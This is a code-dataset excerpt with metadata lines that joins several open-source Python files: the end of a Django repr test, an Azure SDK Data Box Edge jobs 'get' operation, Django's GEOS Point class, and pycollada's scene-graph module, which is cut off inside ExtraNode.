self.assertEqual(repr(Length('a')), "Length(F(a))")
self.assertEqual(repr(Lower('a')), "Lower(F(a))")
self.assertEqual(repr(Substr('a', 1, 3)), "Substr(F(a), Value(1), Value(3))")
self.assertEqual(repr(Upper('a')), "Upper(F(a))")
def test_aggregates(self):
self.assertEqual(repr(Avg('a')), "Avg(F(a))")
self.assertEqual(repr(Count('a')), "Count(F(a), distinct=False)")
self.assertEqual(repr(Max('a')), "Max(F(a))")
self.assertEqual(repr(Min('a')), "Min(F(a))")
self.assertEqual(repr(StdDev('a')), "StdDev(F(a), sample=False)")
self.assertEqual(repr(Sum('a')), "Sum(F(a))")
self.assertEqual(repr(Variance('a', sample=True)), "Variance(F(a), sample=True)")
|
bsd-3-clause
|
Azure/azure-sdk-for-python
|
sdk/databoxedge/azure-mgmt-databoxedge/azure/mgmt/databoxedge/v2019_08_01/operations/_jobs_operations.py
|
1
|
4882
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class JobsOperations(object):
"""JobsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.databoxedge.v2019_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def get(
self,
device_name, # type: str
name, # type: str
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.Job"
"""Gets the details of a specified job on a Data Box Edge/Data Box Gateway device.
Gets the details of a specified job on a Data Box Edge/Data Box Gateway device.
:param device_name: The device name.
:type device_name: str
:param name: The job name.
:type name: str
:param resource_group_name: The resource group name.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Job, or the result of cls(response)
:rtype: ~azure.mgmt.databoxedge.v2019_08_01.models.Job
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Job"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'deviceName': self._serialize.url("device_name", device_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Job', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/jobs/{name}'} # type: ignore
|
mit
|
lanbing510/GTDWeb
|
django/contrib/gis/geos/point.py
|
103
|
4401
|
from ctypes import c_uint
from django.contrib.gis.geos import prototypes as capi
from django.contrib.gis.geos.error import GEOSException
from django.contrib.gis.geos.geometry import GEOSGeometry
from django.utils import six
from django.utils.six.moves import range
class Point(GEOSGeometry):
_minlength = 2
_maxlength = 3
def __init__(self, x, y=None, z=None, srid=None):
"""
The Point object may be initialized with either a tuple or individual
parameters.
For example:
>>> p = Point((5, 23)) # 2D point, passed in as a tuple
>>> p = Point(5, 23, 8) # 3D point, passed in with individual parameters
"""
if isinstance(x, (tuple, list)):
# Here a tuple or list was passed in under the `x` parameter.
ndim = len(x)
coords = x
elif isinstance(x, six.integer_types + (float,)) and isinstance(y, six.integer_types + (float,)):
# Here X, Y, and (optionally) Z were passed in individually, as parameters.
if isinstance(z, six.integer_types + (float,)):
ndim = 3
coords = [x, y, z]
else:
ndim = 2
coords = [x, y]
else:
raise TypeError('Invalid parameters given for Point initialization.')
point = self._create_point(ndim, coords)
# Initializing using the address returned from the GEOS
# createPoint factory.
super(Point, self).__init__(point, srid=srid)
def _create_point(self, ndim, coords):
"""
Create a coordinate sequence, set X, Y, [Z], and create point
"""
if ndim < 2 or ndim > 3:
raise TypeError('Invalid point dimension: %s' % str(ndim))
cs = capi.create_cs(c_uint(1), c_uint(ndim))
i = iter(coords)
capi.cs_setx(cs, 0, next(i))
capi.cs_sety(cs, 0, next(i))
if ndim == 3:
capi.cs_setz(cs, 0, next(i))
return capi.create_point(cs)
def _set_list(self, length, items):
ptr = self._create_point(length, items)
if ptr:
capi.destroy_geom(self.ptr)
self._ptr = ptr
self._set_cs()
else:
# can this happen?
raise GEOSException('Geometry resulting from slice deletion was invalid.')
def _set_single(self, index, value):
self._cs.setOrdinate(index, 0, value)
def __iter__(self):
"Allows iteration over coordinates of this Point."
for i in range(len(self)):
yield self[i]
def __len__(self):
"Returns the number of dimensions for this Point (either 0, 2 or 3)."
if self.empty:
return 0
if self.hasz:
return 3
else:
return 2
def _get_single_external(self, index):
if index == 0:
return self.x
elif index == 1:
return self.y
elif index == 2:
return self.z
_get_single_internal = _get_single_external
def get_x(self):
"Returns the X component of the Point."
return self._cs.getOrdinate(0, 0)
def set_x(self, value):
"Sets the X component of the Point."
self._cs.setOrdinate(0, 0, value)
def get_y(self):
"Returns the Y component of the Point."
return self._cs.getOrdinate(1, 0)
def set_y(self, value):
"Sets the Y component of the Point."
self._cs.setOrdinate(1, 0, value)
def get_z(self):
"Returns the Z component of the Point."
if self.hasz:
return self._cs.getOrdinate(2, 0)
else:
return None
def set_z(self, value):
"Sets the Z component of the Point."
if self.hasz:
self._cs.setOrdinate(2, 0, value)
else:
raise GEOSException('Cannot set Z on 2D Point.')
# X, Y, Z properties
x = property(get_x, set_x)
y = property(get_y, set_y)
z = property(get_z, set_z)
# ### Tuple setting and retrieval routines. ###
def get_coords(self):
"Returns a tuple of the point."
return self._cs.tuple
def set_coords(self, tup):
"Sets the coordinates of the point with the given tuple."
self._cs[0] = tup
# The tuple and coords properties
tuple = property(get_coords, set_coords)
coords = tuple
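# Illustrative usage (a minimal sketch added for clarity, assuming GEOS is
# available; values are shown as GEOS stores them, i.e. as floats):
#
#   >>> p = Point(5, 23)
#   >>> p.x, p.y        # ordinate accessors backed by the coordinate sequence
#   (5.0, 23.0)
#   >>> p.coords        # tuple of the point via the `coords`/`tuple` property
#   (5.0, 23.0)
#   >>> p.x = 10        # setters write through to the coordinate sequence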
|
gpl-2.0
|
Reepca/YAHRP
|
deps/collada/scene.py
|
2
|
36365
|
####################################################################
# #
# THIS FILE IS PART OF THE pycollada LIBRARY SOURCE CODE. #
# USE, DISTRIBUTION AND REPRODUCTION OF THIS LIBRARY SOURCE IS #
# GOVERNED BY A BSD-STYLE SOURCE LICENSE INCLUDED WITH THIS SOURCE #
# IN 'COPYING'. PLEASE READ THESE TERMS BEFORE DISTRIBUTING. #
# #
# THE pycollada SOURCE CODE IS (C) COPYRIGHT 2011 #
# by Jeff Terrace and contributors #
# #
####################################################################
"""This module contains several classes related to the scene graph.
Supported scene nodes are:
* <node> which is loaded as a Node
* <instance_camera> which is loaded as a CameraNode
* <instance_light> which is loaded as a LightNode
* <instance_material> which is loaded as a MaterialNode
* <instance_geometry> which is loaded as a GeometryNode
* <instance_controller> which is loaded as a ControllerNode
* <scene> which is loaded as a Scene
"""
import copy
import numpy
from collada.common import DaeObject, E, tag
from collada.common import DaeError, DaeIncompleteError, DaeBrokenRefError, \
DaeMalformedError, DaeUnsupportedError
from collada.util import toUnitVec
from collada.xmlutil import etree as ElementTree
class DaeInstanceNotLoadedError(Exception):
"""Raised when an instance_node refers to a node that isn't loaded yet. Will always be caught"""
def __init__(self, msg):
super(DaeInstanceNotLoadedError,self).__init__()
self.msg = msg
class SceneNode(DaeObject):
"""Abstract base class for all nodes within a scene."""
def objects(self, tipo, matrix=None):
"""Iterate through all objects under this node that match `tipo`.
The objects will be bound and transformed via the scene transformations.
:param str tipo:
A string for the desired object type. This can be one of 'geometry',
'camera', 'light', or 'controller'.
:param numpy.matrix matrix:
An optional transformation matrix
:rtype: generator that yields the type specified
"""
pass
def makeRotationMatrix(x, y, z, angle):
"""Build and return a transform 4x4 matrix to rotate `angle` radians
around the (`x`,`y`,`z`) axis."""
c = numpy.cos(angle)
s = numpy.sin(angle)
t = (1-c)
return numpy.array([[t*x*x+c, t*x*y - s*z, t*x*z + s*y, 0],
[t*x*y+s*z, t*y*y + c, t*y*z - s*x, 0],
[t*x*z - s*y, t*y*z + s*x, t*z*z + c, 0],
[0, 0, 0, 1]],
dtype=numpy.float32 )
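# Quick sanity check (added for clarity): makeRotationMatrix(0, 0, 1, numpy.pi / 2)
# is a 90 degree rotation about the z axis, so multiplying it with the column
# vector (1, 0, 0, 1) yields (0, 1, 0, 1) up to floating point rounding -- the
# x axis is mapped onto the y axis.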
class Transform(DaeObject):
"""Base class for all transformation types"""
def save(self):
pass
class TranslateTransform(Transform):
"""Contains a translation transformation as defined in the collada <translate> tag."""
def __init__(self, x, y, z, xmlnode=None):
"""Creates a translation transformation
:param float x:
x coordinate
:param float y:
y coordinate
:param float z:
z coordinate
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.x = x
"""x coordinate"""
self.y = y
"""y coordinate"""
self.z = z
"""z coordinate"""
self.matrix = numpy.identity(4, dtype=numpy.float32)
"""The resulting transformation matrix. This will be a numpy.array of size 4x4."""
self.matrix[:3,3] = [ x, y, z ]
self.xmlnode = xmlnode
"""ElementTree representation of the transform."""
if xmlnode is None:
self.xmlnode = E.translate(' '.join([str(x),str(y),str(z)]))
@staticmethod
def load(collada, node):
floats = numpy.fromstring(node.text, dtype=numpy.float32, sep=' ')
if len(floats) != 3:
raise DaeMalformedError("Translate node requires three float values")
return TranslateTransform(floats[0], floats[1], floats[2], node)
def __str__(self):
return '<TranslateTransform (%s, %s, %s)>' % (self.x, self.y, self.z)
def __repr__(self):
return str(self)
class RotateTransform(Transform):
"""Contains a rotation transformation as defined in the collada <rotate> tag."""
def __init__(self, x, y, z, angle, xmlnode=None):
"""Creates a rotation transformation
:param float x:
x coordinate
:param float y:
y coordinate
:param float z:
z coordinate
:param float angle:
angle of rotation, in degrees (as stored in the COLLADA <rotate> tag)
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.x = x
"""x coordinate"""
self.y = y
"""y coordinate"""
self.z = z
"""z coordinate"""
self.angle = angle
"""angle of rotation, in radians"""
self.matrix = makeRotationMatrix(x, y, z, angle*numpy.pi/180.0)
"""The resulting transformation matrix. This will be a numpy.array of size 4x4."""
self.xmlnode = xmlnode
"""ElementTree representation of the transform."""
if xmlnode is None:
self.xmlnode = E.rotate(' '.join([str(x),str(y),str(z),str(angle)]))
@staticmethod
def load(collada, node):
floats = numpy.fromstring(node.text, dtype=numpy.float32, sep=' ')
if len(floats) != 4:
raise DaeMalformedError("Rotate node requires four float values")
return RotateTransform(floats[0], floats[1], floats[2], floats[3], node)
def __str__(self):
return '<RotateTransform (%s, %s, %s) angle=%s>' % (self.x, self.y, self.z, self.angle)
def __repr__(self):
return str(self)
class ScaleTransform(Transform):
"""Contains a scale transformation as defined in the collada <scale> tag."""
def __init__(self, x, y, z, xmlnode=None):
"""Creates a scale transformation
:param float x:
x coordinate
:param float y:
y coordinate
:param float z:
z coordinate
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.x = x
"""x coordinate"""
self.y = y
"""y coordinate"""
self.z = z
"""z coordinate"""
self.matrix = numpy.identity(4, dtype=numpy.float32)
"""The resulting transformation matrix. This will be a numpy.array of size 4x4."""
self.matrix[0,0] = x
self.matrix[1,1] = y
self.matrix[2,2] = z
self.xmlnode = xmlnode
"""ElementTree representation of the transform."""
if xmlnode is None:
self.xmlnode = E.scale(' '.join([str(x),str(y),str(z)]))
@staticmethod
def load(collada, node):
floats = numpy.fromstring(node.text, dtype=numpy.float32, sep=' ')
if len(floats) != 3:
raise DaeMalformedError("Scale node requires three float values")
return ScaleTransform(floats[0], floats[1], floats[2], node)
def __str__(self):
return '<ScaleTransform (%s, %s, %s)>' % (self.x, self.y, self.z)
def __repr__(self):
return str(self)
class MatrixTransform(Transform):
"""Contains a matrix transformation as defined in the collada <matrix> tag."""
def __init__(self, matrix, xmlnode=None):
"""Creates a matrix transformation
:param numpy.array matrix:
This should be an unshaped numpy array of floats of length 16
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.matrix = matrix
"""The resulting transformation matrix. This will be a numpy.array of size 4x4."""
if len(self.matrix) != 16: raise DaeMalformedError('Corrupted matrix transformation node')
self.matrix.shape = (4, 4)
self.xmlnode = xmlnode
"""ElementTree representation of the transform."""
if xmlnode is None:
self.xmlnode = E.matrix(' '.join(map(str, self.matrix.flat)))
@staticmethod
def load(collada, node):
floats = numpy.fromstring(node.text, dtype=numpy.float32, sep=' ')
return MatrixTransform(floats, node)
def __str__(self):
return '<MatrixTransform>'
def __repr__(self):
return str(self)
class LookAtTransform(Transform):
"""Contains a transformation for aiming a camera as defined in the collada <lookat> tag."""
def __init__(self, eye, interest, upvector, xmlnode=None):
"""Creates a lookat transformation
:param numpy.array eye:
An unshaped numpy array of floats of length 3 containing the position of the eye
:param numpy.array interest:
An unshaped numpy array of floats of length 3 containing the point of interest
:param numpy.array upvector:
An unshaped numpy array of floats of length 3 containing the up-axis direction
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.eye = eye
"""A numpy array of length 3 containing the position of the eye"""
self.interest = interest
"""A numpy array of length 3 containing the point of interest"""
self.upvector = upvector
"""A numpy array of length 3 containing the up-axis direction"""
if len(eye) != 3 or len(interest) != 3 or len(upvector) != 3:
raise DaeMalformedError('Corrupted lookat transformation node')
self.matrix = numpy.identity(4, dtype=numpy.float32)
"""The resulting transformation matrix. This will be a numpy.array of size 4x4."""
front = toUnitVec(numpy.subtract(eye,interest))
side = numpy.multiply(-1, toUnitVec(numpy.cross(front, upvector)))
self.matrix[0,0:3] = side
self.matrix[1,0:3] = upvector
self.matrix[2,0:3] = front
self.matrix[3,0:3] = eye
self.xmlnode = xmlnode
"""ElementTree representation of the transform."""
if xmlnode is None:
self.xmlnode = E.lookat(' '.join(map(str,
numpy.concatenate((self.eye, self.interest, self.upvector)) )))
@staticmethod
def load(collada, node):
floats = numpy.fromstring(node.text, dtype=numpy.float32, sep=' ')
if len(floats) != 9:
raise DaeMalformedError("Lookat node requires 9 float values")
return LookAtTransform(floats[0:3], floats[3:6], floats[6:9], node)
def __str__(self):
return '<LookAtTransform>'
def __repr__(self):
return str(self)
class Node(SceneNode):
"""Represents a node object, which is a point on the scene graph, as defined in the collada <node> tag.
Contains the list of transformations affecting the node as well as any children.
"""
def __init__(self, id, children=None, transforms=None, xmlnode=None):
"""Create a node in the scene graph.
:param str id:
A unique string identifier for the node
:param list children:
A list of child nodes of this node. This can contain any
object that inherits from :class:`collada.scene.SceneNode`
:param list transforms:
A list of transformations affecting the node. This can
contain any object that inherits from :class:`collada.scene.Transform`
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.id = id
"""The unique string identifier for the node"""
self.children = []
"""A list of child nodes of this node. This can contain any
object that inherits from :class:`collada.scene.SceneNode`"""
if children is not None:
self.children = children
self.transforms = []
if transforms is not None:
self.transforms = transforms
"""A list of transformations effecting the node. This can
contain any object that inherits from :class:`collada.scene.Transform`"""
self.matrix = numpy.identity(4, dtype=numpy.float32)
"""A numpy.array of size 4x4 containing a transformation matrix that
combines all the transformations in :attr:`transforms`. This will only
be updated after calling :meth:`save`."""
for t in self.transforms:
self.matrix = numpy.dot(self.matrix, t.matrix)
if xmlnode is not None:
self.xmlnode = xmlnode
"""ElementTree representation of the transform."""
else:
self.xmlnode = E.node(id=self.id, name=self.id)
for t in self.transforms:
self.xmlnode.append(t.xmlnode)
for c in self.children:
self.xmlnode.append(c.xmlnode)
def objects(self, tipo, matrix=None):
"""Iterate through all objects under this node that match `tipo`.
The objects will be bound and transformed via the scene transformations.
:param str tipo:
A string for the desired object type. This can be one of 'geometry',
'camera', 'light', or 'controller'.
:param numpy.matrix matrix:
An optional transformation matrix
:rtype: generator that yields the type specified
"""
if matrix is not None: M = numpy.dot( matrix, self.matrix )
else: M = self.matrix
for node in self.children:
for obj in node.objects(tipo, M):
yield obj
def save(self):
"""Saves the geometry back to :attr:`xmlnode`. Also updates
:attr:`matrix` if :attr:`transforms` has been modified."""
self.matrix = numpy.identity(4, dtype=numpy.float32)
for t in self.transforms:
self.matrix = numpy.dot(self.matrix, t.matrix)
for child in self.children:
child.save()
if self.id is not None:
self.xmlnode.set('id', self.id)
self.xmlnode.set('name', self.id)
for t in self.transforms:
if t.xmlnode not in self.xmlnode:
self.xmlnode.append(t.xmlnode)
for c in self.children:
if c.xmlnode not in self.xmlnode:
self.xmlnode.append(c.xmlnode)
xmlnodes = [c.xmlnode for c in self.children]
xmlnodes.extend([t.xmlnode for t in self.transforms])
for n in self.xmlnode:
if n not in xmlnodes:
self.xmlnode.remove(n)
@staticmethod
def load( collada, node, localscope ):
id = node.get('id')
children = []
transforms = []
for subnode in node:
try:
n = loadNode(collada, subnode, localscope)
if isinstance(n, Transform):
transforms.append(n)
elif n is not None:
children.append(n)
except DaeError as ex:
collada.handleError(ex)
return Node(id, children, transforms, xmlnode=node)
def __str__(self):
return '<Node transforms=%d, children=%d>' % (len(self.transforms), len(self.children))
def __repr__(self):
return str(self)
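# Illustrative construction of a scene-graph node (a sketch added for clarity;
# `geom_node` stands in for an existing GeometryNode and is an assumption):
#
#   rot = RotateTransform(0, 0, 1, 90)        # 90 degrees about the z axis
#   move = TranslateTransform(10, 0, 0)
#   node = Node('mynode', children=[geom_node], transforms=[rot, move])
#   node.matrix                               # combined 4x4 transformation matrix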
class NodeNode(Node):
"""Represents a node being instantiated in a scene, as defined in the collada <instande_node> tag."""
def __init__(self, node, xmlnode=None):
"""Creates a node node
:param collada.scene.Node node:
A node to instantiate in the scene
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.node = node
"""An object of type :class:`collada.scene.Node` representing the node to bind in the scene"""
if xmlnode != None:
self.xmlnode = xmlnode
"""ElementTree representation of the node node."""
else:
self.xmlnode = E.instance_node(url="#%s" % self.node.id)
def objects(self, tipo, matrix=None):
for obj in self.node.objects(tipo, matrix):
yield obj
id = property(lambda s: s.node.id)
children = property(lambda s: s.node.children)
matrix = property(lambda s: s.node.matrix)
@staticmethod
def load( collada, node, localscope ):
url = node.get('url')
if not url.startswith('#'):
raise DaeMalformedError('Invalid url in node instance %s' % url)
referred_node = localscope.get(url[1:])
if not referred_node:
referred_node = collada.nodes.get(url[1:])
if not referred_node:
raise DaeInstanceNotLoadedError('Node %s not found in library'%url)
return NodeNode(referred_node, xmlnode=node)
def save(self):
"""Saves the node node back to :attr:`xmlnode`"""
self.xmlnode.set('url', "#%s" % self.node.id)
def __str__(self):
return '<NodeNode node=%s>' % (self.node.id,)
def __repr__(self):
return str(self)
class GeometryNode(SceneNode):
"""Represents a geometry instance in a scene, as defined in the collada <instance_geometry> tag."""
def __init__(self, geometry, materials=None, xmlnode=None):
"""Creates a geometry node
:param collada.geometry.Geometry geometry:
A geometry to instantiate in the scene
:param list materials:
A list containing items of type :class:`collada.scene.MaterialNode`.
Each of these represents a material that the geometry should be
bound to.
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.geometry = geometry
"""An object of type :class:`collada.geometry.Geometry` representing the
geometry to bind in the scene"""
self.materials = []
"""A list containing items of type :class:`collada.scene.MaterialNode`.
Each of these represents a material that the geometry is bound to."""
if materials is not None:
self.materials = materials
if xmlnode != None:
self.xmlnode = xmlnode
"""ElementTree representation of the geometry node."""
else:
self.xmlnode = E.instance_geometry(url="#%s" % self.geometry.id)
if len(self.materials) > 0:
self.xmlnode.append(E.bind_material(
E.technique_common(
*[mat.xmlnode for mat in self.materials]
)
))
def objects(self, tipo, matrix=None):
"""Yields a :class:`collada.geometry.BoundGeometry` if ``tipo=='geometry'``"""
if tipo == 'geometry':
if matrix is None: matrix = numpy.identity(4, dtype=numpy.float32)
materialnodesbysymbol = {}
for mat in self.materials:
materialnodesbysymbol[mat.symbol] = mat
yield self.geometry.bind(matrix, materialnodesbysymbol)
@staticmethod
def load( collada, node ):
url = node.get('url')
if not url.startswith('#'): raise DaeMalformedError('Invalid url in geometry instance %s' % url)
geometry = collada.geometries.get(url[1:])
if not geometry: raise DaeBrokenRefError('Geometry %s not found in library'%url)
matnodes = node.findall('%s/%s/%s'%( tag('bind_material'), tag('technique_common'), tag('instance_material') ) )
materials = []
for matnode in matnodes:
materials.append( MaterialNode.load(collada, matnode) )
return GeometryNode( geometry, materials, xmlnode=node)
def save(self):
"""Saves the geometry node back to :attr:`xmlnode`"""
self.xmlnode.set('url', "#%s" % self.geometry.id)
for m in self.materials:
m.save()
matparent = self.xmlnode.find('%s/%s'%( tag('bind_material'), tag('technique_common') ) )
if matparent is None and len(self.materials)==0:
return
elif matparent is None:
matparent = E.technique_common()
self.xmlnode.append(E.bind_material(matparent))
elif len(self.materials) == 0 and matparent is not None:
bindnode = self.xmlnode.find('%s' % tag('bind_material'))
self.xmlnode.remove(bindnode)
return
for m in self.materials:
if m.xmlnode not in matparent:
matparent.append(m.xmlnode)
xmlnodes = [m.xmlnode for m in self.materials]
for n in matparent:
if n not in xmlnodes:
matparent.remove(n)
def __str__(self):
return '<GeometryNode geometry=%s>' % (self.geometry.id,)
def __repr__(self):
return str(self)
class ControllerNode(SceneNode):
"""Represents a controller instance in a scene, as defined in the collada <instance_controller> tag. **This class is highly
experimental. More support will be added in version 0.4.**"""
def __init__(self, controller, materials, xmlnode=None):
"""Creates a controller node
:param collada.controller.Controller controller:
A controller to instantiate in the scene
:param list materials:
A list containing items of type :class:`collada.scene.MaterialNode`.
Each of these represents a material that the controller should be
bound to.
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.controller = controller
""" An object of type :class:`collada.controller.Controller` representing
the controller being instantiated in the scene"""
self.materials = materials
"""A list containing items of type :class:`collada.scene.MaterialNode`.
Each of these represents a material that the controller is bound to."""
if xmlnode != None:
self.xmlnode = xmlnode
"""ElementTree representation of the controller node."""
else:
self.xmlnode = ElementTree.Element( tag('instance_controller') )
bindnode = ElementTree.Element( tag('bind_material') )
technode = ElementTree.Element( tag('technique_common') )
bindnode.append( technode )
self.xmlnode.append( bindnode )
for mat in materials: technode.append( mat.xmlnode )
def objects(self, tipo, matrix=None):
"""Yields a :class:`collada.controller.BoundController` if ``tipo=='controller'``"""
if tipo == 'controller':
if matrix is None: matrix = numpy.identity(4, dtype=numpy.float32)
materialnodesbysymbol = {}
for mat in self.materials:
materialnodesbysymbol[mat.symbol] = mat
yield self.controller.bind(matrix, materialnodesbysymbol)
@staticmethod
def load( collada, node ):
url = node.get('url')
if not url.startswith('#'): raise DaeMalformedError('Invalid url in controller instance %s' % url)
controller = collada.controllers.get(url[1:])
if not controller: raise DaeBrokenRefError('Controller %s not found in library'%url)
matnodes = node.findall('%s/%s/%s'%( tag('bind_material'), tag('technique_common'), tag('instance_material') ) )
materials = []
for matnode in matnodes:
materials.append( MaterialNode.load(collada, matnode) )
return ControllerNode( controller, materials, xmlnode=node)
def save(self):
"""Saves the controller node back to :attr:`xmlnode`"""
self.xmlnode.set('url', '#'+self.controller.id)
for mat in self.materials:
mat.save()
def __str__(self):
return '<ControllerNode controller=%s>' % (self.controller.id,)
def __repr__(self):
return str(self)
class MaterialNode(SceneNode):
"""Represents a material being instantiated in a scene, as defined in the collada <instance_material> tag."""
def __init__(self, symbol, target, inputs, xmlnode = None):
"""Creates a material node
:param str symbol:
The symbol within a geometry this material should be bound to
:param collada.material.Material target:
The material object being bound to
:param list inputs:
A list of tuples of the form ``(semantic, input_semantic, set)`` mapping
texcoords or other inputs to material input channels, e.g.
``('TEX0', 'TEXCOORD', '0')`` would map the effect parameter ``'TEX0'``
to the ``'TEXCOORD'`` semantic of the geometry, using texture coordinate
set ``0``.
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.symbol = symbol
"""The symbol within a geometry this material should be bound to"""
self.target = target
"""An object of type :class:`collada.material.Material` representing the material object being bound to"""
self.inputs = inputs
"""A list of tuples of the form ``(semantic, input_semantic, set)`` mapping
texcoords or other inputs to material input channels, e.g.
``('TEX0', 'TEXCOORD', '0')`` would map the effect parameter ``'TEX0'``
to the ``'TEXCOORD'`` semantic of the geometry, using texture coordinate
set ``0``."""
if xmlnode is not None:
self.xmlnode = xmlnode
"""ElementTree representation of the material node."""
else:
self.xmlnode = E.instance_material(
*[E.bind_vertex_input(semantic=sem, input_semantic=input_sem, input_set=set)
for sem, input_sem, set in self.inputs]
, **{'symbol': self.symbol, 'target':"#%s"%self.target.id} )
@staticmethod
def load(collada, node):
inputs = []
for inputnode in node.findall( tag('bind_vertex_input') ):
inputs.append( ( inputnode.get('semantic'), inputnode.get('input_semantic'), inputnode.get('input_set') ) )
targetid = node.get('target')
if not targetid.startswith('#'): raise DaeMalformedError('Incorrect target id in material '+targetid)
target = collada.materials.get(targetid[1:])
if not target: raise DaeBrokenRefError('Material %s not found'%targetid)
return MaterialNode(node.get('symbol'), target, inputs, xmlnode = node)
def objects(self):
pass
def save(self):
"""Saves the material node back to :attr:`xmlnode`"""
self.xmlnode.set('symbol', self.symbol)
self.xmlnode.set('target', "#%s"%self.target.id)
inputs_in = []
for i in self.xmlnode.findall( tag('bind_vertex_input') ):
input_tuple = ( i.get('semantic'), i.get('input_semantic'), i.get('input_set') )
if input_tuple not in self.inputs:
self.xmlnode.remove(i)
else:
inputs_in.append(input_tuple)
for i in self.inputs:
if i not in inputs_in:
self.xmlnode.append(E.bind_vertex_input(semantic=i[0], input_semantic=i[1], input_set=i[2]))
def __str__(self):
return '<MaterialNode symbol=%s targetid=%s>' % (self.symbol, self.target.id)
def __repr__(self):
return str(self)
class CameraNode(SceneNode):
"""Represents a camera being instantiated in a scene, as defined in the collada <instance_camera> tag."""
def __init__(self, camera, xmlnode=None):
"""Create a camera instance
:param collada.camera.Camera camera:
The camera being instantiated
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.camera = camera
"""An object of type :class:`collada.camera.Camera` representing the instantiated camera"""
if xmlnode != None:
self.xmlnode = xmlnode
"""ElementTree representation of the camera node."""
else:
self.xmlnode = E.instance_camera(url="#%s"%camera.id)
def objects(self, tipo, matrix=None):
"""Yields a :class:`collada.camera.BoundCamera` if ``tipo=='camera'``"""
if tipo == 'camera':
if matrix is None: matrix = numpy.identity(4, dtype=numpy.float32)
yield self.camera.bind(matrix)
@staticmethod
def load( collada, node ):
url = node.get('url')
if not url.startswith('#'): raise DaeMalformedError('Invalid url in camera instance %s' % url)
camera = collada.cameras.get(url[1:])
if not camera: raise DaeBrokenRefError('Camera %s not found in library'%url)
return CameraNode( camera, xmlnode=node)
def save(self):
"""Saves the camera node back to :attr:`xmlnode`"""
self.xmlnode.set('url', '#'+self.camera.id)
def __str__(self):
return '<CameraNode camera=%s>' % (self.camera.id,)
def __repr__(self):
return str(self)
class LightNode(SceneNode):
"""Represents a light being instantiated in a scene, as defined in the collada <instance_light> tag."""
def __init__(self, light, xmlnode=None):
"""Create a light instance
:param collada.light.Light light:
The light being instantiated
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.light = light
"""An object of type :class:`collada.light.Light` representing the instantiated light"""
if xmlnode != None:
self.xmlnode = xmlnode
"""ElementTree representation of the light node."""
else:
self.xmlnode = E.instance_light(url="#%s"%light.id)
def objects(self, tipo, matrix=None):
"""Yields a :class:`collada.light.BoundLight` if ``tipo=='light'``"""
if tipo == 'light':
if matrix is None: matrix = numpy.identity(4, dtype=numpy.float32)
yield self.light.bind(matrix)
@staticmethod
def load( collada, node ):
url = node.get('url')
if not url.startswith('#'): raise DaeMalformedError('Invalid url in light instance %s' % url)
light = collada.lights.get(url[1:])
if not light: raise DaeBrokenRefError('Light %s not found in library'%url)
return LightNode( light, xmlnode=node)
def save(self):
"""Saves the light node back to :attr:`xmlnode`"""
self.xmlnode.set('url', '#'+self.light.id)
def __str__(self): return '<LightNode light=%s>' % (self.light.id,)
def __repr__(self): return str(self)
class ExtraNode(SceneNode):
"""Represents extra information in a scene, as defined in a collada <extra> tag."""
def __init__(self, xmlnode):
"""Create an extra node which stores arbitrary xml
:param xmlnode:
Should be an ElementTree instance of tag type <extra>
"""
if xmlnode != None:
self.xmlnode = xmlnode
"""ElementTree representation of the extra node."""
else:
